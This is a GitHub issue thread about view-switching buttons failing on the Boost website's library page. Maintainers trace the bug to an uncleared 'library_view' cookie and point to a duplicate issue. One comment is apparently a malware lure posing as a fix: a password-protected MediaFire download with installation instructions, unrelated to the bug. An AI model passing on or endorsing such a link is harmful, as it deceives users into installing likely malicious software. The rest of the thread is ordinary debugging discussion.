### ISSUE TITLE
library buttons not working properly

### ISSUE THREAD

**Issue by rbbeeston** [boostorg/website-v2#1213]
On the library page, switching views between the list and category buttons doesn't work unless you first go to the grid view. @frankwiles suggested it may have to do with how the version paging works. 

interestingly, the issue reverses if a version of boost that is not the current version is used. in that case the grid view has problems, and has to be clicked twice to react properly.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rbbeeston** [comment]
After investigating this, I have found the following:

1. The primary issue is caused by the cookie value library_view not being cleared out on a button change.
2. When the value is cleared there are 2 other issues that appear. The grid view needs to be clicked twice to appear, and when changing the version, it doesn't always change clearly and the button needs to be clicked twice in order to properly display the version results.

All these issues need to be resolved in the views.py file so I'm leaving it open for either @kennethreitz or @frankwiles to look at when they have time.

**Comment by sdarwin** [comment]
Also discussed in https://github.com/boostorg/website-v2/issues/1146 .  Although the CDN does not seem to be involved here, `#1146` mentions a way to bypass the CDN.  On an issue like this, it can be helpful.

**Comment by rbbeeston** [comment]
that's essentially the same issue, should I mark this as a duplicate and prioritize the other, as there's a lot more clarity in the other one.
